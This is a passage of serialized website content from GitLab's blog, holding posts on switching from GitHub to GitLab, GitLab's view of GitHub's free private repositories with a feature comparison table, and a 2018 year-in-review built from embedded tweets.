more.\n\n1. **3rd Party Integrations:** As mentioned above, GitLab has 3rd party integrations for several services such as CI, code coverage, messaging, etc. 
Their Slack integration is great for notifying your team when stuff has been merged into master. I will be honest though, I am sure GitHub has more integrations.\n\n1. **All the features that make GitHub great:** GitLab also ships with Wikis, Markdown-based readmes, etc. You don’t really lose any features by switching, but you gain a ton.\n\n![screengrab](https://about.gitlab.com/images/blogimages/git-wars-2.png){: .shadow}\u003Cbr>\n\n### So if it’s so great, why isn’t everyone using it?\n\nThere are a couple of answers to that question. First off, you have the market share factor. GitHub was one of the first Git hosting providers to market and they’ve managed to hold onto that. That means that if you want people to contribute to your project, it helps to have it on GitHub because chances are the people that you want to contribute have an account.\n\nThe other answer is related. Comfortability. People are simply comfortable with the tool they know and a lot of people aren’t like me (willing to throw everything out the window because I truly believe that the better product should get my business). This is the same reason so many people are still using Atlassian products. It’s definitely not because of their user interfaces.\n\n### So where should I go from here?\n\nThat depends on you. If you’re comfortable getting to know a new way of doing things, I’d suggest you take a look at GitLab. It really is worth the time you’ll put into it.\n\nIf you’re already *comfortable* then go ahead and stick with what you know, but at least now you know that there are alternatives.\n\n## About the Author\n\n[Chris Watson](https://twitter.com/idev0urer) is a freelance full-stack developer who occasionally enjoys sharing some of his many opinions with the world. 
He and his wife currently reside in sunny Arizona.\n\n_This post was originally published on [blog.cwatsondev.com](https://blog.cwatsondev.com/git-wars-why-im-switching-to-gitlab/)._\n\n“[paper battle](https://www.flickr.com/photos/die_ani/9024130/)” by [anika](https://www.flickr.com/photos/die_ani/) is licensed under [CC0 1.0](https://creativecommons.org/publicdomain/zero/1.0/)\n{: .note}\n",[751,9,910],{"slug":2174,"featured":6,"template":689},"git-wars-switching-to-gitlab","content:en-us:blog:git-wars-switching-to-gitlab.yml","Git Wars Switching To Gitlab","en-us/blog/git-wars-switching-to-gitlab.yml","en-us/blog/git-wars-switching-to-gitlab",{"_path":2180,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2181,"content":2186,"config":2192,"_id":2194,"_type":14,"title":2195,"_source":16,"_file":2196,"_stem":2197,"_extension":19},"/en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators",{"title":2182,"description":2183,"ogTitle":2182,"ogDescription":2183,"noIndex":6,"ogImage":2028,"ogUrl":2184,"ogSiteName":673,"ogType":674,"canonicalUrls":2184,"schema":2185},"GitHub's free private repos: GitLab's perspective","GitLab's CEO reflects on this move and what it means for the software development space.","https://about.gitlab.com/blog/github-offering-free-private-repos-for-up-to-three-collaborators","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitHub now offers free private repos for up to three collaborators – here are our thoughts\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2019-01-07\",\n      }",{"title":2187,"description":2183,"authors":2188,"heroImage":2028,"date":2189,"body":2190,"category":299,"tags":2191},"GitHub now offers free private repos for up to three collaborators – here are our thoughts",[1235],"2019-01-07","\nGitHub just launched [free private repos with up to three 
collaborators](https://blog.github.com/2019-01-07-new-year-new-github/). I like to think that increased competition from us (GitLab) contributed to this change – as one Hacker News commenter stated, [\"Thank you GitLab for providing market competition forcing GitHub to consider this!\"](https://news.ycombinator.com/item?id=18848142)\n\n## Some history\n\nWhen we [originally announced GitLab.com](https://news.ycombinator.com/item?id=4428278) I made the main point that it would have private repos for free. I think it is great for beginner users that private repos on GitHub are now free.\nIf you're starting to program and aren't ready to share your code with the world yet, you don't have to have a paid account to keep it private.\n\nAt the time, I was very disappointed to learn that Bitbucket.org already offered the same. GitLab took off despite that and GitLab.com recently surpassed [10 million projects](https://twitter.com/gitlab/status/1075377374022262784) and in the [top dev tools ranking of Axosoft](https://blog.axosoft.com/top-developer-tools-2019/) GitLab climbed the ranks 4 spots and overtook GitHub for the first year.\n\n## Looking ahead\n\nAt GitLab we think that repositories will become a commodity. I think Microsoft will try to generate more revenue with people using Azure more instead of paying for repos. We're focusing on making a single application for the entire DevOps lifecycle [that can replace a lot of other tools](/competition/). Or, [as Stavros Korokithakis phrased it](https://news.ycombinator.com/item?id=18848066): \"My move to GitLab was basically 'Come for the free repos, stay for the rest of the amazing features.' 
I will not be moving off it, and my new repos will keep being on GitLab.\"\n\nWe think the long-term trend is [multi-cloud](https://medium.com/gitlab-magazine/multi-cloud-maturity-model-2de185c01dd7) and we'll keep shipping with our [2,200 other contributors](http://contributors.gitlab.com/) to make this a reality.\n\nIn the meantime, here are some more details of our current GitLab free private repository offering vs GitHub's:\n\n| Free functionality                  | GitLab    | GitHub                                    |\n|--------------------------|-----------|-------------------------------------------|\n| Private repositories     | Yes       | Yes                                       |\n| Number of collaborators  | Unlimited | 3                                         |\n| Wiki                     | Yes       | No (public or paid only)                  |\n| Pages                    | Yes       | No (public or paid only)                  |\n| Capacity                 | 10GB      | 1GB                                       |\n| [Indicates who is paying](https://twitter.com/rgaiacs/status/1082581763745083392)  | No        | Yes                                 |\n| Free CI                 | 2,000 min.     
| Maybe a free tier for Actions on Azure                              |\n| [Entire DevOps lifecycle](https://about.gitlab.com/stages-devops-lifecycle/) | Yes | No |\n| Location of the repo | Anywhere | Not in groups/orgs |\n| API concurrent rate limit | 36000 | 5000 |\n\nSign up for a [free trial](https://about.gitlab.com/pricing/#gitlab-com)\n",[930,9],{"slug":2193,"featured":6,"template":689},"github-offering-free-private-repos-for-up-to-three-collaborators","content:en-us:blog:github-offering-free-private-repos-for-up-to-three-collaborators.yml","Github Offering Free Private Repos For Up To Three Collaborators","en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators.yml","en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators",{"_path":2199,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2200,"content":2206,"config":2212,"_id":2214,"_type":14,"title":2215,"_source":16,"_file":2216,"_stem":2217,"_extension":19},"/en-us/blog/gitlab-2018-year-in-review",{"title":2201,"description":2202,"ogTitle":2201,"ogDescription":2202,"noIndex":6,"ogImage":2203,"ogUrl":2204,"ogSiteName":673,"ogType":674,"canonicalUrls":2204,"schema":2205},"2018: GitLab's year in review","Take a look at the highlight reel from 2018 – from landing $100M in funding to welcoming a host of great open source projects to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670162/Blog/Hero%20Images/happy-holidays-cover.png","https://about.gitlab.com/blog/gitlab-2018-year-in-review","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"2018: GitLab's year in review\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Emily von Hoffmann\"},{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2019-01-10\",\n      
}",{"title":2201,"description":2202,"authors":2207,"heroImage":2203,"date":2209,"body":2210,"category":299,"tags":2211},[2208,1859],"Emily von Hoffmann","2019-01-10","\n\nIn 2018, we added 289 new team members, raised another round of funding, spread the word about remote work, surpassed 2,000 contributors, welcomed some awesome open source projects to GitLab, and shipped 12 releases. It's been a banner year for GitLab, so before diving into 2019, we invite you to peer back through the mists of time at the top events from the past year, according to our community:\n\n- [Product news](#product-news)\n- [Community news](#community-news)\n- [Company news](#gitlab-news)\n\n## Product news\n\n### We announced GitLab Serverless\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Announcing GitLab Serverless 🚀\u003Ca href=\"https://t.co/Iu4GwHsaYK\">https://t.co/Iu4GwHsaYK\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1072521159638482945?ref_src=twsrc%5Etfw\">December 11, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We introduced Meltano\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Hey, data teams! We&#39;re working on a tool just for you. 
Read all about Meltano, from \u003Ca href=\"https://twitter.com/jakecodes?ref_src=twsrc%5Etfw\">@jakecodes\u003C/a> &amp; @tayloramurphy1 ✌️  \u003Ca href=\"https://t.co/egEzILPNzu\">https://t.co/egEzILPNzu\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1024773311367131137?ref_src=twsrc%5Etfw\">August 1, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### You got _really_ excited about the Web IDE\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">👋 Meet the GitLab Web IDE!\u003Ca href=\"https://t.co/vhx2RR1uU6\">https://t.co/vhx2RR1uU6\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1007679206187249664?ref_src=twsrc%5Etfw\">June 15, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We successfully migrated to GCP and have noticed some improvements\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">What&#39;s up with \u003Ca href=\"https://t.co/W0iwxWzEZ8\">https://t.co/W0iwxWzEZ8\u003C/a>? 
I wrote an analysis of \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@GitLab\u003C/a>&#39;s stability and performance since we migrated to \u003Ca href=\"https://twitter.com/googlecloud?ref_src=twsrc%5Etfw\">@googlecloud\u003C/a> in August.\u003Ca href=\"https://t.co/8JvvbVq9wJ\">https://t.co/8JvvbVq9wJ\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/GoogleCloud?src=hash&amp;ref_src=twsrc%5Etfw\">#GoogleCloud\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/Cloud?src=hash&amp;ref_src=twsrc%5Etfw\">#Cloud\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/DevOps?src=hash&amp;ref_src=twsrc%5Etfw\">#DevOps\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/SaaS?src=hash&amp;ref_src=twsrc%5Etfw\">#SaaS\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/performance?src=hash&amp;ref_src=twsrc%5Etfw\">#performance\u003C/a> \u003Ca href=\"https://t.co/L6TWhh2Z0B\">pic.twitter.com/L6TWhh2Z0B\u003C/a>\u003C/p>&mdash; Andrew Newdigate (@suprememoocow) \u003Ca href=\"https://twitter.com/suprememoocow/status/1050467664584462337?ref_src=twsrc%5Etfw\">October 11, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nAND you can check out [all our releases from 2018 (and from all time) over here](/releases/categories/releases/).\n\n## Community news\n\n### GNOME moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Anyway, I&#39;m proud of \u003Ca href=\"https://twitter.com/gnome?ref_src=twsrc%5Etfw\">@gnome\u003C/a> because we achieved it, we made a huge effort on adapting and will continue doing it because that&#39;s who we are. And with this, I want to announce that the mass migration to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> is now completed! Welcome all to 2018! 
🎉\u003C/p>&mdash; Carlos Soriano (@csoriano1618) \u003Ca href=\"https://twitter.com/csoriano1618/status/1001501640623640577?ref_src=twsrc%5Etfw\">May 29, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Drupal moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Welcome to the party \u003Ca href=\"https://twitter.com/drupal?ref_src=twsrc%5Etfw\">@drupal\u003C/a>! 🎉 \u003Ca href=\"https://t.co/umLw6YlSTl\">https://t.co/umLw6YlSTl\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1030164542360375296?ref_src=twsrc%5Etfw\">August 16, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Freedesktop.org moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We get pretty excited when open source projects tell us they’re \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a>. Welcome, \u003Ca href=\"https://twitter.com/hashtag/freedesktop?src=hash&amp;ref_src=twsrc%5Etfw\">#freedesktop\u003C/a>! 
\u003Ca href=\"https://t.co/oLIfXZb7Va\">https://t.co/oLIfXZb7Va\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1031864994747609088?ref_src=twsrc%5Etfw\">August 21, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Errrrrybody is #movingtogitlab\n\nWell, not _quite_, but 10x the normal daily number is still a big deal 😎\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re seeing 10x the normal daily amount of repositories \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://t.co/7AWH7BmMvM\">https://t.co/7AWH7BmMvM\u003C/a> We&#39;re scaling our fleet to try to stay up. Follow the progress on \u003Ca href=\"https://t.co/hN0ce379SC\">https://t.co/hN0ce379SC\u003C/a> and \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003409836170547200?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Y'all had _feelings_ about burnout\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">‣ Don&#39;t go straight to work after you wake up.\u003Cbr>‣ Put \u003Ca href=\"https://twitter.com/hashtag/Slack?src=hash&amp;ref_src=twsrc%5Etfw\">#Slack\u003C/a> notifications on dnd on weekends. 
\u003Cbr>‣ When you notice someone in a different time zone should be asleep, tell them.\u003Ca href=\"https://t.co/zKiytIMXsJ\">https://t.co/zKiytIMXsJ\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/975463098676076544?ref_src=twsrc%5Etfw\">March 18, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And everyone struggles with Git sometimes\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Git happens! Here&#39;s how to fix it 💅\u003Ca href=\"https://t.co/IMAuDH8j3P\">https://t.co/IMAuDH8j3P\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1058445892464902146?ref_src=twsrc%5Etfw\">November 2, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">How &amp; why to keep your Git commit history clean 💻✨ via \u003Ca href=\"https://twitter.com/Kushal_Pandya?ref_src=twsrc%5Etfw\">@Kushal_Pandya\u003C/a> \u003Ca href=\"https://t.co/HbYv2KsyGQ\">https://t.co/HbYv2KsyGQ\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1006245935675006977?ref_src=twsrc%5Etfw\">June 11, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We celebrated 20 years of open source ❤️\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re excited to celebrate the 20th anniversary of open source this year at \u003Ca 
href=\"https://twitter.com/hashtag/OSCON?src=hash&amp;ref_src=twsrc%5Etfw\">#OSCON\u003C/a>! Check out our brief history of OSS ✨ \u003Ca href=\"https://t.co/ox2s1rDS9f\">https://t.co/ox2s1rDS9f\u003C/a> \u003Ca href=\"https://t.co/LIdQtQWeoO\">pic.twitter.com/LIdQtQWeoO\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1018886162851811328?ref_src=twsrc%5Etfw\">July 16, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And made GitLab Gold free for open source projects and educational institutions 🎉\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Today, we&#39;re excited to announce that GitLab Ultimate and Gold are now free for educational institutions and open source projects 💜\u003Ca href=\"https://t.co/5PA08IYnwM\">https://t.co/5PA08IYnwM\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1004033746897719298?ref_src=twsrc%5Etfw\">June 5, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We celebrated inspiring GitLab users\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Video and blog about my journey from stunting motorcycles to \u003Ca href=\"https://twitter.com/hashtag/Kubernetes?src=hash&amp;ref_src=twsrc%5Etfw\">#Kubernetes\u003C/a> - and some gushing about my love for \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> \u003Ca href=\"https://t.co/ro73lucF7n\">https://t.co/ro73lucF7n\u003C/a>\u003C/p>&mdash; Leah Petersen (@eccomi_leah) \u003Ca 
href=\"https://twitter.com/eccomi_leah/status/1009894688906792960?ref_src=twsrc%5Etfw\">June 21, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And there was lots of love for GitLab swag\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003C!-- first tweet -->\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Thanks for the swag \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>. That&#39;s one reason to contribute 😃 \u003Ca href=\"https://t.co/58Z1PsGTen\">pic.twitter.com/58Z1PsGTen\u003C/a>\u003C/p>&mdash; Amit Rathi (@amittrathi) \u003Ca href=\"https://twitter.com/amittrathi/status/1074562107545272320?ref_src=twsrc%5Etfw\">December 17, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C!-- second tweet -->\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">It’s the first time that I receive a birthday gift from the company that I work for. It’s simple, small and modest... but it goes a long way. Thanks \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> I love them 😍👍🎉 \u003Ca href=\"https://t.co/AMCUdQevFu\">pic.twitter.com/AMCUdQevFu\u003C/a>\u003C/p>&mdash; Matej Latin (@matejlatin) \u003Ca href=\"https://twitter.com/matejlatin/status/1039473209291231232?ref_src=twsrc%5Etfw\">September 11, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">When it comes to swag, \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> has raised the bar. This is an actual wooden pin. 
More pins as swag please 😬 cheers \u003Ca href=\"https://twitter.com/samdbeckham?ref_src=twsrc%5Etfw\">@samdbeckham\u003C/a> \u003Ca href=\"https://t.co/bcZtvqAjPE\">pic.twitter.com/bcZtvqAjPE\u003C/a>\u003C/p>&mdash; Sophie Koonin (@type__error) \u003Ca href=\"https://twitter.com/type__error/status/1058105160176726017?ref_src=twsrc%5Etfw\">November 1, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Thank you to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> for the swag! Dear participants, we have many things for you 😁 \u003Ca href=\"https://t.co/9BINX4UbLD\">pic.twitter.com/9BINX4UbLD\u003C/a>\u003C/p>&mdash; TechForum eXplore (@TeXWL) \u003Ca href=\"https://twitter.com/TeXWL/status/1011652998953611268?ref_src=twsrc%5Etfw\">June 26, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">First package of swag for our CI/CD \u003Ca href=\"https://twitter.com/hashtag/Hackathon?src=hash&amp;ref_src=twsrc%5Etfw\">#Hackathon\u003C/a> arrived - yes: there will be \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> socks! 49 people RSVPed so far - it‘s gonna be epic! 
via \u003Ca href=\"https://twitter.com/MeetupDE?ref_src=twsrc%5Etfw\">@MeetupDE\u003C/a> \u003Ca href=\"https://t.co/fZtBd7VZRi\">https://t.co/fZtBd7VZRi\u003C/a> \u003Ca href=\"https://t.co/qyLbTeZN2t\">pic.twitter.com/qyLbTeZN2t\u003C/a>\u003C/p>&mdash; Michael Lihs (@kaktusmimi) \u003Ca href=\"https://twitter.com/kaktusmimi/status/970199201320665088?ref_src=twsrc%5Etfw\">March 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n## GitLab news\n\n### We announced Series D funding and joined the 🦄 club\n\nIn September we [announced $100 million in Series D funding](/blog/announcing-100m-series-d-funding/), led by ICONIQ Capital. This brought our valuation to over $1 billion, and we couldn't be more excited to use this momentum to become best-in-class in every DevOps software category, from planning to monitoring.\n\n### We made #44 on the Inc. 5000 list\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">ICYMI: We made number 44 on the \u003Ca href=\"https://twitter.com/hashtag/inc5000?src=hash&amp;ref_src=twsrc%5Etfw\">#inc5000\u003C/a> list of 2018&#39;s fastest-growing companies 🎉: \u003Ca href=\"https://t.co/x3jBqItfVK\">https://t.co/x3jBqItfVK\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1032201460946268160?ref_src=twsrc%5Etfw\">August 22, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We hung out IRL in beautiful Cape Town\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Good morning from Cape Town! 
It&#39;s Day 6 of the GitLab Summit 😍 \u003Ca href=\"https://t.co/WHvaSnKHM4\">pic.twitter.com/WHvaSnKHM4\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1034402765974450176?ref_src=twsrc%5Etfw\">August 28, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We made #17 on YC's 2018 Top Companies list\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Feeling proud of everyone \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@GitLab\u003C/a>: as of October 2018, we are number 17 of the \u003Ca href=\"https://twitter.com/ycombinator?ref_src=twsrc%5Etfw\">@YCombinator\u003C/a> Top Companies List, among companies like Airbnb, Stripe, Dropbox, Reddit and Twitch \u003Ca href=\"https://t.co/UQZCaBAUeJ\">https://t.co/UQZCaBAUeJ\u003C/a> \u003Ca href=\"https://t.co/YUJbDhRSyq\">pic.twitter.com/YUJbDhRSyq\u003C/a>\u003C/p>&mdash; Pedro MS (@PedroMScom) \u003Ca href=\"https://twitter.com/PedroMScom/status/1068146315404763139?ref_src=twsrc%5Etfw\">November 29, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And we debuted some 🔥 integrations\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Apple just announced Xcode 10 is now integrated with GitLab \u003Ca href=\"https://t.co/eQbtiY4IYm\">pic.twitter.com/eQbtiY4IYm\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003764673454342144?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" 
charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We’re so excited to announce the new GKE integration for GitLab! Now you’re just moments away from a scalable development environment. \u003Ca href=\"https://t.co/4RRVOXlrwz\">https://t.co/4RRVOXlrwz\u003C/a> \u003Ca href=\"https://t.co/RSWwZDSPup\">pic.twitter.com/RSWwZDSPup\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/981916957527044096?ref_src=twsrc%5Etfw\">April 5, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\nThat's all for now! We can't wait to see what 2019 will bring 🌟 As always, come hang out and tweet us your thoughts [@gitlab](https://twitter.com/gitlab).\n",[267,803,930,9],{"slug":2213,"featured":6,"template":689},"gitlab-2018-year-in-review","content:en-us:blog:gitlab-2018-year-in-review.yml","Gitlab 2018 Year In 